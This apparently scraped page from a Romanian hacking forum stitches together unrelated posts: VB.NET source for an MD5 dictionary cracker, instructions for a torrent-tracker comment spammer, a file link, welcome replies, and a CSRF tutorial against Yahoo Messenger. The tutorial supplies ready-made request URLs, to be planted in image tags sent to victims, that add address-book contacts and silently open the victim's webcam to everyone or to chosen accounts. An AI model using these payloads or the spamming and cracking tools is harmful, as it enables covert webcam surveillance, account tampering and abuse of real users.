Leaderboard

Am vazut ca panicatii de pe forum mi-au sarit in cap ca am pus keylogger in Md5 Bruteforcer, si m-am gandit sa fac sursa publica ca toti copii sa fure si sa puna numele lor pe ea. --------------------------------------------------- [1] Se introduc : - un timer - 5 milisecunde / porneste cu form-ul - un background worker pentru treaba. [2] Se importa urmatoarele : Imports System Imports System.Text Imports System.Security.Cryptography [3] Se ia urmatoarea functie pentru Md5 care aparent NU se gaseste pe net . Function getMd5Hash(ByVal input As String) As String Dim md5Hasher As MD5 = MD5.Create() Dim data As Byte() = md5Hasher.ComputeHash(Encoding.Default.GetBytes(input)) Dim sBuilder As New StringBuilder() Dim i As Integer For i = 0 To data.Length - 1 sBuilder.Append(data(i).ToString("x2")) Next i Return sBuilder.ToString() End Function [4][a] Butonul pentru citit & split-uit wordlist-ul in listbox : Try If CheckBox2.Checked = True Then ListBox1.Items.Clear() Else ' Go fuck yourself ;D End If Dim ofd As New OpenFileDialog ofd.Filter = "Text files (*.txt) |*.txt" ofd.Title = "Open wordlist" ofd.ShowDialog() TextBox1.Text = ofd.FileName ListBox1.Items.AddRange(Split _ (My.Computer.FileSystem.ReadAllText _ (TextBox1.Text), vbNewLine)) Catch ex As Exception MsgBox(ErrorToString, MsgBoxStyle.Critical, "Error loading wordlist") End Try * Checkbox2 curata lista. [4] Butonul care adauga o linie manual : If CheckBox1.Checked = True Then ListBox1.Items.Clear() ListBox1.Items.Add(TextBox3.Text) TextBox3.Text = "" Else ListBox1.Items.Add(TextBox3.Text) TextBox3.Text = "" End If [5] Timer-ul : Label1.Text = "You have " & ListBox1.Items.Count & " lines." [6] Butonul pentru decriptare care porneste background worker-ul : BackgroundWorker1.RunWorkerAsync() ![7] Butonul pentru criptarea Md5 : TextBox5.Text = getMd5Hash(TextBox4.Text) !![8] Decriptarea pe baza de dictionar (munca background worker-ului) : For Each item In ListBox1.Items Dim item_md5 As String = getMd5Hash(item) If TextBox2.Text = item_md5 Then MsgBox("Provided Md5 : " & TextBox2.Text & vbNewLine & "Plain text : " & item) End If Next - Ia fiecare item din lista respectiva - Il cripteaza in Md5 - Daca este identic cu Md5-ul vostru, a gasit plain. --------------------------------------------------- Pentru cei care cunosc (orice) limbaj(e) de programare : a fost greu ? Important e sa ai imaginatie si restul vine de la sine. Pentru toti copiii frustrati care vor copia sursa si isi vor pune numele lor pe ea : credite mie (pr00f), sau vin si va omor ra?a cu care faceti baie.

Pentru cei ce nu stiu,xtremezone este unul dintre cele mai mari trackere din tara.Are in jur de 20k unici pe zi conform statisticilor de la astia Statistici si Monitorizare Web - Detalii/Statistici - www.myxz.org, fiind clasat pe locul 373 in romania,conform alexa. Img: Cum sa il folosesti: Editezi in julitura.php $username,$pass. Urci tot pe un host/localhost cu curl on. La Comment scrii textul tau cu linku` tau sau ce vrei tu sa faci. La categorie selectezi ce categorie vrei sa spamezi. La numarul paginii spamate introduci un numarul paginii pe care o sa spamezi(adica torentele de pe pagina aceea).Numarul paginilor il iei manual,ducandu-te la categoria pe care vrei sa o spamezi si dand click in josul paginii pe ultima pagina cu torrente[unde scrie 1 - 50 | 51 - 100 | ... | 1101 - 1150 | 1151 - 1159],apoi te uiti in link,la sfarsit o sa fie ceva de genu: page=23,unde 23 este numarul de pagini,tu spamezi pagina 0,1,5,7,9,23 sau ce pagini vrei tu. Spammeru` posteaza 2 commenturi la minut,deoarece trackeru` are limita de 30 secunde intre postarea commentariilor,asta inseamna ca in 10 minute posteaza 20,iar in 25 minute 50 de commentarii(o pagina).Poti pune scriptul in foldere diferite,setat cu user&pass diferite pentru o rata mai mare. Download: here //Comentariile raman in functie de norocul vostru ,mie mi-au ramas in jur de 24h,pana la ban pe toate conturile si stergerea lor. //sper sa nu fi uitat nimic de mentionat:)

il dau eu gratis ULTIMATE FACEBOOK FBML FANPAGE SCRIPTS PACK.zip edit: http://www.mediafire.com/?8al483db59bs160

programu asta e facut de pr00f de pe insecurity.ro scz daca fac reclama dar raman la rst:P

Nytro, te rog sa-mi dai si mie un cod JavaScript pentru programul asta, sau un header HTTP, ca eu nu stiu, sunt un incepator...

De ce am impresia ca ameninti aiurea?Cum facea si ala din topicu' de acu' doua zile...cand luati ccuri si alte alea si va ''ameninta'' ca va dau pe mana militiei sariti de cur in sus si ii bagati pe unde au venit,dar cdand intrati cu ''mana voastra'' in programe aiurea nu mai e asa de nasoala politia. Nu nu am nimic cu tine:) poate ai dreptate,e o simpla parere. vezi ce procese ruleaza, gaseste exe-u, scaneaza-l pe VT si o sa-l vada si antivirusu'.FUD 100% ma-ndoiesc eu ca e

Wellcome! Sper sa iti placa forumul.

bai bine ai venit...userii noi sunt luati la ture ca sunt si idioti ... nu citesc regulile cu atentie si nu se documenteaza inainte sa intre in vorba. o fac pentru posturi sau sa se afle in treaba. Fi matur in gandire si nu te arunca la discutii care nu te privesc si o sa scapi...ma rog...o data si o data o sa se mai apuce unu de tine..dar nu pune la suflet.. bun venit pe rst..

sal'tare cum a zis si yceman, documenteaza-te inainte de a posta, cauta peste tot si daca nu gasesti nimic, atunci vino si intreaba aici, si cand pui o intrebare pune-o intr-un mod inteligent.

Salut, bine ai venit.

stima si respect domnului damned. (Ai grija ce topicuri deschizi, sper sa nu te vedem cu post-uri "Cum sparg parola") Iti urez bun venit.

Continut: 1) Prezentare 2) Accesarea addressbook-ului 3) Accesarea webcamului fara aprobare 1) Prezentare Toti ati auzit de yahoo insider. Cei mai multi merg pe ideea ca e panarama aia de fereastra care o inchizi cand deschizi mess-ul. Yahoo insider reprezinta insa accesul web la intreg motorasul messengerului. Prin intermediul lui poti accesa diverse setari ale contului, ale yahoo-ului in format XML. Poti accesa address book-ul. Poti lista chat-rooms-urile. In anumite cazuri poti face si setari. Bineinteles ca pentru a putea accesa trebuie sa fii logat. Am facut insa un test simplu si se pare ca cererile le poti face atat prin link direct cat si prin <IMG SRC>. Cu ce ajuta? Inseamna ca pot oricand trimite pe email unui user sub forma unei false fotografii un CSRF care ii va schimba anumite setari. Nu trimiteti link-urile pe messenger. Persoana respectiva poate sa nu fie logata pe browser. Puteti insa trimite un astfel de link trecand printr-un redirect de login in yahoo. Insiderul se acceseaza folosind link-ul: http://insider.msg.yahoo.com/ycontent/?parametri Lista de parametri (incompleta insa) extrasa din yahoo messenger (am dat copy-paste cum am gasit. %s inseamna ca primeste un sir, %d un numar). &langpacks=%slangpacks &slot=%dslottest &ads=%sads &notifications=%snotifications &reliablemessaging=%s &emoticonorder=%semoticonorder &emoticon=%semoticons &av=%sav &imscanners=%simscanners &settings=%ssettings &userfeedback=%suserfeedback &modules=%s &defaultplugin=%s &safeobjects=%s &revokedplugin=%s &sidepanel=%s &contenttab=%s &voicesmiley=%svoicesmiley &partner=%spartner &marketing=%smarketing &logos=%slogos &dct2=%s &dct1=%s &getgp=%sgameprowler &audiblemenu=%saudiblerevoked &getwc=%s &chatcat=%s &games=%s &sms=%s &searchbar=%ssearchbar &url=%surls &system=%ssystem &imv=%simvironments &filter=%s &defaultcountry=1 &countries=%s Exemple: fmt=format. Ofera suplimentar numele feed-ului, nu stiu exact cu ce se mai ocupa dar l-am lasat in coada. http://insider.msg.yahoo.com/ycontent/&fmt=2 Observatie: <content time="1266943437"></content> 1266943437 reprezinta numarul de secunde care au trecut de la data 01/01/1970 00:00:00 GMT (ora 2 in RO). Interesant pentru alte cereri, gen addessbook care ofera data la care ai facut un update. Informatii despre chatrooms: http://insider.msg.yahoo.com/ycontent/?chatcat&fmt=2 http://insider.msg.yahoo.com/ycontent/?chatroom_1000&fmt=2 Setarile de webcam: http://insider.msg.yahoo.com/ycontent/?&getwc=0&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US Addressbook: http://insider.msg.yahoo.com/ycontent/?ab2=1&intl=us&os=win%22&fmt=2 Ca fapt divers sa ne uitam la <farm id="458"/> Amintindu-mi de yahoo cookie generator, ID-ul (458 in acest caz) apare in subcookie-ul Td.SL (sled ID). SL decodat din base64 este de forma 458[0x01]123456789. Lista tarilor si a codurilor telefonice: http://insider.msg.yahoo.com/ycontent/?countries System: http://insider.msg.yahoo.com/ycontent/?system&fmt=2 Imvironments: http://insider.msg.yahoo.com/ycontent/?imv Sms: http://insider.msg.yahoo.com/ycontent/?sms=0 etc... Va mai jucati voi. Atentie insa, presupun ca e posibil sa va dereglati setarile asa ca nu lucrati pe contul de zi cu zi (mi-am stricat eu ceva si nu stiu cum) Acum sa trecem la partea fierbinte: Link-urile de mai jos cum am spus functioneaza atat timp cat persoana este logata in browser. Asta inseamna ca ori deschideti o sesiune in mail, ori trimiteti link-ul la o victima. Cazul 2 sub forma html cu <img src="link"> 2) Accesarea addressbook-ului Sa ne introducem in addressbook: http://insider.msg.yahoo.com/ycontent/?addab=0&fname=Gigel&lname=Coaiegrele&yid=pulamea@yahoo.com&nname=pulamea fname=first name lname=last name yid=yahoo id nname=nickname Verificati addressbook-ul pe http://insider.msg.yahoo.com/ycontent/?ab&fmt=2 http://insider.msg.yahoo.com/ycontent/?ab2&fmt=2 Odata introdus nu va apare imediat in addressbook in yahoo messenger. Dar va apare la refresh in mail->contacts Nu prea inseamna mult dar sa ajungem la partea si mai frumoasa: 3) Accesarea webcamului fara aprobare Intrebarea existentiala CUM SA VEDEM WEBCAMUL FARA PERMISIUNE Raspuns: setam messengerul: messenger->preferences->webcam broadcast bifam allow everyone. Sau bifam always allow the following people to view my webcam si adaugam contul dorit. Cu alte cuvinte: http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=1&chat_access=1&ignore_view=0&intl=us img_quality=[1-10]. 1=viteza 10=calitate. viewer_access=[0-2] 0 - default: cere voie 1 - lasa pe toata lumea 2 - da voie numai la cei din lista chat_access=[0-1] lasa toti userii din chat sa vada camera sau nu. Asta da pwn la labar! Daca suntem baieti mai "sufletisti" hai sa ne bagam numai noi in lista de persoane autorizate: http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=2&chat_access=0&ignore_view=1&friends=pulete1@yahoo.com,pulete2@yahoo.com&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US friends=lista de useri acceptati, cu randurile despartite de virgula ignore_view=[0-1] ignora alte cereri de la cei care nu sunt in lista Pentru verificarea setarilor facute apelati getwc: http://insider.msg.yahoo.com/ycontent/?getwc=1 Bineinteles ca victima va vedea cati useri il privesc, aici depinde de prostia victimei si de norocul vostru. Sper sa gasesc mai multe sa pot continua!